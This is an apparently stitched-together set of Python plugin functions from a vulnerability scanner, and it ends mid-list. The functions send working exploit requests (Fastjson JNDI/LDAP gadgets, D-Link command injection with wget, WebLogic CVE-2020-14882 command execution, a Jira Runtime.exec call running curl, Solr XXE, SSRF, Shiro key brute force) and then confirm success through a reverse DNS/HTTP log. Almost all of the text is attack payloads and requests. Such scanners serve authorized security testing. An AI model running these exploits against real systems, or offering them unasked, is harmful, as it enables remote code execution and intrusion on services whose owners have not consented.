def querytosave(self, payloads, param): payload, hexdata = payloads[0] res, res_data = query_reverse(hexdata) if res: self.save(param, payload) return for payload, hexdata in payloads[1:]: # 后面的不睡眠等待 res, res_data = query_reverse(hexdata, False) if res: self.save(param, payload) break
def querytosave(self, querys): if querys == []: return hexdata, bodywithpayload = querys[0] res, res_data = query_reverse(hexdata) if res: self.save(bodywithpayload) return for hexdata, bodywithpayload in querys[1:]: # 后面的不睡眠等待 res, res_data = query_reverse(hexdata, False) if res: self.save(bodywithpayload) break
def verify(self): if not self.dictdata.get("request").get( "content_type") == 4: # data数据类型为json return parse = dictdata_parser(self.dictdata) if not self.can_output(parse.getrootpath() + self.name): # 限定只输出一次 return payload_ = '''{"%(random_str)s": {"@type": "java.net.Inet4Address", "val": "%(domain)s"}}''' random_str = get_random_str(6).lower() _, domain_ = generate(parse.getfilepath(), "dns") payload = payload_ % {"random_str": random_str, "domain": domain_} req = parse.generaterequest({"data": payload}) r = request(**req) if r is not None: res, res_data = query_reverse(domain_) if res: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": parser_.geturl(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others": "{} in dnslog".format(domain_), "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } }) self.can_output(parse.getrootpath() + self.name, True) return
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return reverseurl, hexdata1 = generate(get_random_str(10).lower(), "http") _, hexdata2 = generate(get_random_str(10).lower(), "dns") for reverse in [reverseurl, "http://" + hexdata2]: req = { "url": self.url + "proxy.stream?origin={}".format(reverse), "method": "GET", "headers": { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" }, "verify": False, "timeout": 10, } r = request(**req) sleep = True for hexdata in [hexdata1, hexdata2]: res, resdata = query_reverse(hexdata, sleep) sleep = False if res: self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "path": "proxy.stream?origin={reverseurl}", "others": "{} in reverse db".format(hexdata), } }) break
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return cmds, hexdata = generate_reverse_payloads("dlink-cve-2019-16920-rce" + self.url) url = cmds[0].split(" ")[-1] req = { "method": "POST", "url": self.url + "apply_sec.cgi", "headers": { "Content-Type": "application/x-www-form-urlencoded", }, "data": '''html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20{}'''.format( url), "timeout": 10, "verify": False, "allow_redirects": False } r = request(**req) res, resdata = query_reverse(hexdata) if r != None and res: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": parser_.geturl(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others":"{} in reverse data".format(hexdata), "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): if not self.check_rule(self.dictdata, self.require): # 检查是否满足测试条件 return # 判断weblogic if "weblogic" not in "".join(self.dictdata.get("service").values()).lower(): return jarfile = os.path.join(paths.MYSCAN_HOSTSCAN_BIN, "weblogic", "CVE-2020-14645.jar") ldapaddr, ldaphexdata = generate(self.addr + get_random_str(6), "ldap") _, dnshexdata = generate(self.addr + get_random_str(6), "dns") protocol = "https" if "https" in "".join(self.dictdata.get("service").keys()) else "http" start_process(["java", "-jar", jarfile, ldapaddr.replace("ldap://", "", 1), "{protocol}://{addr}:{port}/".format(protocol=protocol, **self.dictdata)]) start_process(["java", "-jar", jarfile, dnshexdata, "{protocol}://{addr}:{port}/".format(protocol=protocol, **self.dictdata)]) for i, hexdata in enumerate((ldaphexdata, dnshexdata)): sleep = True if i == 0 else False res, data = query_reverse(hexdata, sleep) if res: self.result.append({ "name": self.name, "url": "tcp://{}:{}".format(self.addr, self.port), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others": "found {} in reverse log ".format(hexdata) } }) break
def count_status(): red = getredis() while True: try: time.sleep(int(scan_set.get("status_flush_time", 30))) burpdata_undo = red.llen("burpdata") vuln = red.llen("vuln_all") data = red.hmget("count_all", "doned", "request", "block_host", "request_fail") burpdata_doned, request, block_host, request_fail = list( map(lambda x: x.decode(), data)) reverse_count = 0 res, resdata = query_reverse("myscan_total") if res: reverse_count = int(resdata.get("total")) logger.warning( "do/undo:{}/{} req_succ:{}/fail:{} blockhost:{} vuln:{}/reverse:{}" .format(burpdata_doned, burpdata_undo, request, request_fail, block_host, vuln, reverse_count), text="STATUS") except KeyboardInterrupt as ex: logger.warning("Ctrl+C was pressed ,aborted program") except Exception as ex: logger.warning("Count stat moudle get error:{}".format(ex)) pass
def query(self): sleep = True for param, hexdata in self.hexdatas: res, _ = query_reverse(hexdata, sleep) sleep = False if res: self.result.append({ "name": self.name, "url": self.parse.getrootpath(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "payload": self.payload, "param": "body部分" if param is None else param.get("name", ""), "others": "{} in dnslog".format(hexdata), "request": self.parse.getrequestraw(), "response": self.parse.getresponseraw() } }) self.can_output(self.parse.getrootpath() + self.name, True) return
def verify(self): # 限定一下目录深度,reverse还是严格点 if self.url.count("/") != 3: return reverse_urls, hexdata_url = generate_reverse_payloads(self.name) reverse_dnscmd, hexdata_dns = generate_reverse_payloads( self.name, "dns") # reverse_urls_ = filter(lambda x: x.startswith("curl") or x.startswith("wget"), reverse_urls) tasks = reverse_dnscmd + reverse_urls mythread(self.run, tasks) sleep = True for hexdata in [hexdata_url, hexdata_dns]: query_res, _ = query_reverse(hexdata, sleep) sleep = False if query_res: parser_ = dictdata_parser(self.dictdata) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others:": "{} in dnslog".format(hexdata), "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } }) break
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return reverse_urls, hexdata_url = generate_reverse_payloads(self.name) reverse_dnscmd, hexdata_dns = generate_reverse_payloads(self.name, "dns") tasks = reverse_dnscmd + reverse_urls for task in tasks: self.exploit(task) # 存在delete task,单线程比较好 if self.isnifi: sleep = True for hexdata in [hexdata_url, hexdata_dns]: query_res, _ = query_reverse(hexdata, sleep) sleep = False if query_res: parser_ = dictdata_parser(self.dictdata) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others:": "{} in dnslog".format(hexdata), "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } }) break
def verify(self): if self.dictdata.get("url").get("extension") in notAcceptedExt: return self.parse = dictdata_parser(self.dictdata) if not self.can_output(self.parse.getrootpath() + self.name): # 限定只输出一次 return # 针对参数为json格式 params = self.dictdata.get("request").get("params").get("params_url") + \ self.dictdata.get("request").get("params").get("params_body") test_args = [] for param in params: arg = param.get("value", "") if isjson(arg): test_args.append(param) # 针对body部分为json格式的数据包 if self.dictdata.get("request").get( "content_type") == 4: # data数据类型为json test_args.append(None) payloads = [ '''{"RANDOM": {"@type": "java.net.Inet4Address", "val": "DOMAIN"}}''', '''Set[{"@type":"java.net.URL","val":"http://DOMAIN"}''', '''{{"@type":"java.net.URL","val":"http://DOMAIN"}:0''', '''{"@type":"java.net.InetSocketAddress"{"address":,"val":"DOMAIN"}}''', ] if test_args: datas = [] for payload in payloads: for arg_ in test_args: datas.append((payload, arg_)) mythread(self.send_payload, datas, cmd_line_options.threads) # query dns log sleep = True for param, hexdata in self.hexdatas: res, res_data = query_reverse(hexdata, sleep) sleep = False if res: self.result.append({ "name": self.name, "url": self.parse.getrootpath(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others": "{} in dnslog".format(hexdata), "param": "no param ,body vuln" if param is None else param.get( "name", ""), "request": self.parse.getrequestraw(), "response": self.parse.getresponseraw() } }) self.can_output(self.parse.getrootpath() + self.name, True) return
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return reverse_urls, reverse_data = generate_reverse_payloads(self.name) _, dns_data = generate(self.name, "dns") tasks = [] for reverse_url in reverse_urls: for cmd in [reverse_url, reverse_url.replace(reverse_set.get("reverse_http_ip", ""), dns_data)]: for path in ["", "securityRealm/user/admin/"]: tasks.append((cmd, path)) mythread(self.run, list(set(tasks))) sleep = True for hexdata in [reverse_data, dns_data]: query_res, _ = query_reverse(hexdata, sleep) sleep = False if query_res: parser_ = dictdata_parser(self.dictdata) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others:": "{} in dnslog".format(hexdata), "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } }) break
def verify(self): # 添加限定条件 self.result_ = {} if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return self.parser = dictdata_parser(self.dictdata) find_it = False payloads = self.generatepayloads() for os_ver in ["win", "linux"]: for payload in payloads[os_ver]: req = { "url": self.url + "wls-wsat/CoordinatorPortType", "method": "POST", "headers": { "Content-Type": "text/xml;charset=UTF-8", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" }, "verify": False, "data": self.get_windows_payload(payload) if "win" == os_ver else self.get_linux_payload(payload), "timeout": 10, } r = request(**req) if r != None and r.status_code == 500 and b"<?xml version=" in r.content: find_it = True ##check hexdatas = list(set(payloads["hexdata"])) res, res_data = query_reverse(hexdatas[0]) if res: self.save(2, "find {} in reverse log ".format(hexdatas[0])) return for hexdata in hexdatas[1:]: # 后面的不睡眠等待 res, res_data = query_reverse(hexdata, False) if res: self.save(2, "find {} in reverse log".format(hexdata)) return if find_it: self.save(0, "maybe vuln due to the response")
def verify(self): if self.dictdata.get("url").get("extension") not in "": return if not self.can_output(self.parse.getrootpath() + self.name): # 限定只输出一次 return self.parse = dictdata_parser(self.dictdata) reqs = [] params = self.dictdata.get("request").get("params").get("params_url") # body为urlencode类型 if self.dictdata.get("request").get( "content_type") == 1: # data数据类型为urlencode params += self.dictdata.get("request").get("params").get( "params_body") # gen,payload 具体参数自己慢慢测试吧,没标定是那个参数 cmds = [] payloads_, hexdata = generate_reverse_payloads(self.name) _, dnshexdata = generate_reverse_payloads(self.name, "dns") for payload in payloads_: cmds.append(payload) cmds.append( payload.replace(reverse_set.get("reverse_http_ip"), dnshexdata)) for param in params: for cmd in cmds: for payload, func in self.payloads: payload = payload % (func(cmd)) req = self.parse.getreqfromparam(param, "a", payload, False) reqs.append(req) # send it mythread(self.send, reqs) # query sleep = True for hexdata in [hexdata, dnshexdata]: query_res, _ = query_reverse(hexdata, sleep) sleep = False if query_res: self.result.append({ "name": self.name, "url": self.parse.getrootpath(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others:": "{} in dnslog".format(hexdata), "request": self.parse.getrequestraw(), "response": self.parse.getresponseraw() } }) self.can_output(self.parse.getrootpath() + self.name, True) break
def verify(self): # 添加限定条件 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return #sangfor require https if self.dictdata.get("url").get("protocol", "") == "http": return self.parser = dictdata_parser(self.dictdata) can_check = False payloads = self.generatepayloads() for os_ver in ["win", "linux"]: for payload in payloads[os_ver]: req = { "url": self.url + "por/checkurl.csp?retry=1&timeout=4&url=www.baidu.com;{}". format(payload), "method": "GET", "headers": { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" }, "verify": False, "timeout": 10, } r = request(**req) if r is not None and r.status_code == 200 and r.content == b"1": can_check = True ##check if can_check: hexdatas = list(set(payloads["hexdata"])) res, res_data = query_reverse(hexdatas[0]) if res: self.save(2, "find {} in reverse log ".format(hexdatas[0])) return for hexdata in hexdatas[1:]: # 后面的不睡眠等待 res, res_data = query_reverse(hexdata, False) if res: self.save(2, "find {} in reverse log".format(hexdata)) return self.save(0, "根据特征,应该存在漏洞,但是由于不出网等原因,所以无反向请求")
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return req = { "method": "GET", "url": self.url + "solr/admin/cores?wt=json", "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers "timeout": 10, "allow_redirects": False, "verify": False, } r = request(**req) if r != None and r.status_code == 200 and b"responseHeader" in r.content: name = re.search('"name":"(.*?)"', r.text) if name: name = name.group(1) reverse_data = generate_reverse_payloads("solr_xxe") url = reverse_data[0][0].split(" ", 1)[1] req["url"] = self.url + '''solr/{name}/select?q=<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY % remote SYSTEM "{url}"> %remote;]> <root/>&wt=xml&defType=xmlparser'''.format(name=name, url=url) r1 = request(**req) query_res,data=query_reverse(reverse_data[1]) if query_res: request_ = "" response_ = "" if r1 != None: parser_ = response_parser(r1) request_ = parser_.getrequestraw() response_ = parser_.getresponseraw() self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "payload": req["url"].encode(), "vulmsg": self.vulmsg, "request": request_, "response": response_ } }) else: self.result.append({ "name": self.name, "url": self.url, "level": 0, # 0:Low 1:Medium 2:High "detail": { "payload": req["url"].encode(), "vulmsg": "target open solr ,target :{}".format(self.url + "solr/admin/cores?wt=json"), } })
def count_status(): red = getredis() while True: try: time.sleep(int(scan_set.get("status_flush_time", 30))) burpdata_undo = red.llen("burpdata") if scan_set.get("random_test", False): # workdata = red.spop("work_data_py_set") unactive = red.scard("work_data_py_set") else: # red.lpush("work_data_py", pickledata) # workdata = red.lpop("work_data_py") unactive = red.llen("work_data_py") vuln = red.llen("vuln_all") data = red.hmget("count_all", "doned", "request", "block_host", "request_fail", "active") burpdata_doned, request, block_host, request_fail, active = list( map(lambda x: x.decode(), data)) reverse_count = 0 res, resdata = query_reverse("myscan_total") if res: reverse_count = int(resdata.get("total")) if cmd_line_options.command == "hostscan": logger.warning( "do/undo/active/unactive:{}/{}/{}/{} vuln:{}/reverse:{}". format(burpdata_doned, burpdata_undo, active, unactive, vuln, reverse_count), text="STATUS") elif cmd_line_options.command == "webscan": if cmd_line_options.allow_plugin: undoplugin = red.llen("plugin_data_py") logger.warning( "do/undo/active/unactive/undoplugin:{}/{}/{}/{}/{} req_total/fail:{}/{} blockhost:{} vuln:{}/reverse:{}" .format(burpdata_doned, burpdata_undo, active, unactive, undoplugin, request, request_fail, block_host, vuln, reverse_count), text="STATUS") else: logger.warning( "do/undo/active/unactive:{}/{}/{}/{} req_total/fail:{}/{} blockhost:{} vuln:{}/reverse:{}" .format(burpdata_doned, burpdata_undo, active, unactive, request, request_fail, block_host, vuln, reverse_count), text="STATUS") except KeyboardInterrupt as ex: logger.warning("Ctrl+C was pressed ,aborted program") except Exception as ex: logger.warning("Count stat moudle get error:{}".format(ex)) traceback.print_exc() pass
def poc2(self): '''' from: https://github.com//jas502n//CVE-2020-14882 ''' for postdata in [ '''_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("{}")''', '''_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("{}")''' ]: random_file = get_random_str(9).lower() + ".xml" url, hexdata = generate(random_file, "http2") req = { "method": "POST", "url": self.url + '''console/images/%252E%252E%252Fconsole.portal''', "data": postdata.format(url), "headers": { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169" }, "allow_redirects": False, "timeout": 10, "verify": False, } r = request(**req) res, _ = query_reverse(hexdata) if res: parser = response_parser( r) if r is not None else dictdata_parser(self.dictdata) self.result.append({ "name": self.name, "url": self.dictdata.get("url").get("url").split("?")[0] if r is None else r.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others": "second way to find :{} in reverse".format(hexdata), "payload:": postdata, "request": parser.getrequestraw(), "response": parser.getresponseraw() } })
def save(self,r,hexdata,other=""): if r != None: res, res_data = query_reverse(hexdata) if res: parse_ = response_parser(r) self.result.append({ "name": self.name, "url": self.dictdata.get("url").get("url").split("?")[0], "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "othermsg":other, "request": parse_.getrequestraw(), "response": parse_.getresponseraw(), } })
def poc1(self, data): cmd, hexdata = data payload = '''?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27{}%27);%22);''' req = { "method": "POST", "url": self.url + '''console/images/%252E%252E%252Fconsole.portal''', "data": payload.format(parse.quote(cmd)), "headers": { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169" }, "allow_redirects": False, "timeout": 10, "verify": False, } r = request(**req) if not self.poc1_success: res, _ = query_reverse(hexdata) if res: parser = response_parser( r) if r is not None else dictdata_parser(self.dictdata) if not self.poc1_success: self.poc1_success = True self.result.append({ "name": self.name, "url": self.dictdata.get("url").get("url").split("?")[0] if r is None else r.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others": "first way to find :{} in reverse".format(hexdata), "payload": payload, "request": parser.getrequestraw(), "response": parser.getresponseraw() } })
def verify(self): if self.dictdata.get("url").get("extension").lower() in notAcceptedExt: return self.parse = dictdata_parser(self.dictdata) self.maxkey = self.parse.getrootpath() + self.name set_cookie = self.dictdata.get("response").get("headers").get( "Set-Cookie", None) if set_cookie is not None and "rememberMe=deleteMe" in set_cookie: # 一个站点只测试一次,无论成功与否 if not self.can_output(self.maxkey): return # 做过了一次,此ip:port将不会再做 self.can_output(self.maxkey, True) # send key to enum mythread(self.send_poc, self.shirokyes, cmd_line_options.threads) # query from reverse_dnslog sleep = True for querykey, shirokey in self.querykeys.items(): res, resdata = query_reverse(querykey, sleep) sleep = False if res: self.result.append({ "name": self.name, "url": self.parse.getfilepath(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "key": shirokey, "request": self.parse.getrequestraw(), "response": self.parse.getresponseraw() } }) break if self.result == []: self.result.append({ "name": "shiro found", "url": self.parse.getfilepath(), "level": 0, # 0:Low 1:Medium 2:High "detail": { "vulmsg": "found shiro and brute key is failed. maybe the web server can't access dnslog ,try others tools .", "request": self.parse.getrequestraw(), "response": self.parse.getresponseraw() } })
def verify(self): # 限定一下目录深度,涉及反连,谨慎点 if self.url.count("/") != 3: return # 验证是否是xxl-job req = { "method": "POST", "url": self.url + "run", "headers": { "Content-Type": "application/json" }, "allow_redirects": False, "verify": False, "timeout": 10 } r = request(**req) if r is not None and b"com.xxl.job.core.server" in r.content: reverse_urls, hexdata_url = generate_reverse_payloads(self.name) reverse_dnscmd, hexdata_dns = generate_reverse_payloads( self.name, "dns") # reverse_urls_ = filter(lambda x: x.startswith("curl") or x.startswith("wget"), reverse_urls) tasks = reverse_dnscmd + reverse_urls mythread(self.run, tasks) sleep = True for hexdata in [hexdata_url, hexdata_dns]: query_res, _ = query_reverse(hexdata, sleep) sleep = False if query_res: parser_ = dictdata_parser(self.dictdata) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others:": "{} in dnslog".format(hexdata), "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } }) break
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return payload = '''{ "type" : "read", "mbean" : "java.lang:type=Memory", "target" : { "url" : "service:jmx:rmi:///jndi/%s" } }''' req = { "method": "POST", "url": self.url + "jolokia/", "headers": { "Content-Type": "application/x-www-form-urlencoded" }, "data": "", "timeout": 10, "allow_redirects": False, "verify": False, } data = self.generate() for payload_ in data["payload"]: req["data"] = payload % (payload_) r = request(**req) sleep = True parser_ = dictdata_parser(self.dictdata) for hexdata_ in list(set(data["hexdata"])): res, res_data = query_reverse(hexdata_, sleep=sleep) sleep = False if res: self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return # 验证是否是saltstack req = { "method": "GET", "url": self.url, "allow_redirects": False, "verify": False, "timeout": 10 } r = request(**req) if r is not None and b"local_async" in r.content and b"local_batch" in r.content: reverse_urls, hexdata_url = generate_reverse_payloads(self.name) reverse_dnscmd, hexdata_dns = generate_reverse_payloads( self.name, "dns") # reverse_urls_ = filter(lambda x: x.startswith("curl") or x.startswith("wget"), reverse_urls) tasks = reverse_dnscmd + reverse_urls mythread(self.run, tasks) sleep = True for hexdata in [hexdata_url, hexdata_dns]: query_res, _ = query_reverse(hexdata, sleep) sleep = False if query_res: parser_ = dictdata_parser(self.dictdata) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others:": "{} in dnslog".format(hexdata), "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } }) break
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return reverse_url, reverse_data = generate_reverse_payloads("jira_ssrf") reverse_url = reverse_url[0].split(" ")[1] req = { "method": "GET", "url": self.url + "secure/ContactAdministrators!default.jspa", "allow_redirects": False, "verify": False, "timeout": 10 } r = request(**req) if r != None and r.status_code == 200: res = re.search('name="atlassian-token" content="(?P<token>.+?)"', r.text) if res: token = res.groupdict().get('token') req["url"] = self.url + "secure/ContactAdministrators.jspa" req["method"] = "POST" req["data"] = "from=admin%40163.com&subject=%24i18n.getClass%28%29.forName%28%27java.lang.Runtime%27%29.getMethod%28%27getRuntime%27%2Cnull%29.invoke%28null%2Cnull%29.exec%28%curl+{reverseUrl}+%27%29.waitFor%28%29&details=exange%20website%20links&atl_token={token}&%E5%8F%91%E9%80%81=%E5%8F%91%E9%80%81".format( reverseUrl=quote(reverse_url), token=token) r1 = request(**req) if r1 != None and r1.status_code == 302: query_res, query_data = query_reverse(reverse_data) if query_res: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return url = "{protocol}://{host}:{port}".format(**self.dictdata.get("url")) reverse_url, reverse_data = generate_reverse_payloads("jira_ssrf") reverse_url = reverse_url[0].split(" ")[1] req = { "method": "GET", "headers": { "X-Atlassian-Token": "no-check", }, "url": self.url + "plugins/servlet/gadgets/makeRequest?url={}@{}".format( url, reverse_url), "allow_redirects": True, "verify": False, "timeout": 10 } r = request(**req) if r != None and b"don't be evil" in r.content: res, res_data = query_reverse(reverse_data) if res: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 限定一下目录深度,reverse还是严格点 if self.url.count("/") != 3: return reverse_urls, reverse_data = generate_reverse_payloads(self.name) # reverse_urls_ = filter(lambda x: x.startswith("curl") or x.startswith("wget"), reverse_urls) _, dns_data = generate(self.name, "dns") tasks = [] for reverse_url in reverse_urls: for cmd in [ reverse_url, reverse_url.replace(reverse_set.get("reverse_http_ip", ""), dns_data) ]: tasks.append(cmd) mythread(self.run, tasks) sleep = True for hexdata in [reverse_data, dns_data]: query_res, _ = query_reverse(hexdata, sleep) sleep = False if query_res: parser_ = dictdata_parser(self.dictdata) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others:": "{} in dnslog".format(hexdata), "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } }) break
def verify(self): if self.dictdata.get("url").get("extension") in notAcceptedExt: return if not self.can_output(self.parse.getrootpath() + self.name): # 限定只输出一次 return needtests = [] # body为json类型 if self.dictdata.get("request").get("content_type") == 4: # data数据类型为json needtests.append(None) # 针对参数为json格式 params = self.dictdata.get("request").get("params").get("params_url") + \ self.dictdata.get("request").get("params").get("params_body") for param in params: arg = param.get("value", "") if isjson(arg): needtests.append(param) # test payloads payloads = [ { "vul": "ver=1.2.47", "payload": '''{ "rasdnd1": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "randfd2": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "%(ldap)s", "autoCommit": true } }''', "type": "ldap" }, { "vul": "ver=1.2.43", "payload": '''{"raasdnd1":{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"%(ldap)s","autoCommit":true]}}''', "type": "ldap" }, { "vul": "ver=1.2.42", "payload": '''{ "rasdfnd1": { "@type": "LLcom.sun.rowset.JdbcRowSetImpl;;", "dataSourceName": "%(ldap)s", "autoCommit": true } }''', "type": "ldap" }, { "vul": "1.2.25<=ver<=1.2.41", "payload": '''{ "ranfasdfd1": { "@type": "Lcom.sun.rowset.JdbcRowSetImpl;", "dataSourceName": "%(ldap)s", "autoCommit": true } }''', "type": "ldap" }, { "vul": "<=1.2.24", "payload": '''{ "radassnd1": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "%(ldap)s", "autoCommit": true } }''', "type": "ldap" }, { "vul": "ibatis-core:3.0", "payload": '''{ "raasdnd1": { "@type": "org.apache.ibatis.datasource.jndi.JndiDataSourceFactory", "properties": { "data_source": "%(ldap)s" } } }''', "type": "ldap" }, { "vul": "spring-context:4.3.7.RELEASE", "payload": '''{ "ransdasd1": { "@type": "org.springframework.beans.factory.config.PropertyPathFactoryBean", "targetBeanName": "%(ldap)s", "propertyPath": "foo", "beanFactory": { "@type": "org.springframework.jndi.support.SimpleJndiBeanFactory", "shareableResources": [ "%(ldap)s" ] } } }''', "type": "ldap" }, { "vul": "unknown", "payload": '''{ "raasd2nd1": Set[ { "@type": "org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor", "beanFactory": { "@type": "org.springframework.jndi.support.SimpleJndiBeanFactory", "shareableResources": [ "%(ldap)s" ] }, "adviceBeanName": "%(ldap)s" }, { "@type": "org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor" } ]}''', "type": "ldap" }, { "vul": "unknown", "payload": '''{ "rand1": { "@type": "com.mchange.v2.c3p0.JndiRefForwardingDataSource", "jndiName": "%(ldap)s", "loginTimeout": 0 } }''', "type": "ldap" } ] datas = [] for payload in payloads: for arg in needtests: datas.append((payload, arg)) mythread(self.send_payload, datas, cmd_line_options.threads) # query reverse log sleep = True for hexdata, msg in self.saveflags.items(): payload, vul = msg res, resdata = query_reverse(hexdata, sleep) sleep = False if res: self.result.append({ "name": self.name, "url": self.parse.getrootpath(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "payload": payload, "version": vul, "others": "dnslog res:{}".format(resdata), "request": self.parse.getrequestraw(), "response": self.parse.getresponseraw() } }) self.can_output(self.parse.getrootpath() + self.name, True)
def verify(self): if not self.dictdata.get("request").get( "content_type") == 4: # data数据类型为json return if not self.can_output(self.parse.getrootpath() + self.name): # 限定只输出一次 return payloads = [{ "vul": "ver=1.2.47", "payload": '''{ "rasdnd1": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "randfd2": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "%(ldap)s", "autoCommit": true } }''', "type": "ldap" }, { "vul": "ver=1.2.43", "payload": '''{"raasdnd1":{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"%(ldap)s","autoCommit":true]}}''', "type": "ldap" }, { "vul": "ver=1.2.42", "payload": '''{ "rasdfnd1": { "@type": "LLcom.sun.rowset.JdbcRowSetImpl;;", "dataSourceName": "%(ldap)s", "autoCommit": true } }''', "type": "ldap" }, { "vul": "1.2.25<=ver<=1.2.41", "payload": '''{ "ranfasdfd1": { "@type": "Lcom.sun.rowset.JdbcRowSetImpl;", "dataSourceName": "%(ldap)s", "autoCommit": true } }''', "type": "ldap" }, { "vul": "<=1.2.24", "payload": '''{ "radassnd1": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "%(ldap)s", "autoCommit": true } }''', "type": "ldap" }, { "vul": "ibatis-core:3.0", "payload": '''{ "raasdnd1": { "@type": "org.apache.ibatis.datasource.jndi.JndiDataSourceFactory", "properties": { "data_source": "%(ldap)s" } } }''', "type": "ldap" }, { "vul": "spring-context:4.3.7.RELEASE", "payload": '''{ "ransdasd1": { "@type": "org.springframework.beans.factory.config.PropertyPathFactoryBean", "targetBeanName": "%(ldap)s", "propertyPath": "foo", 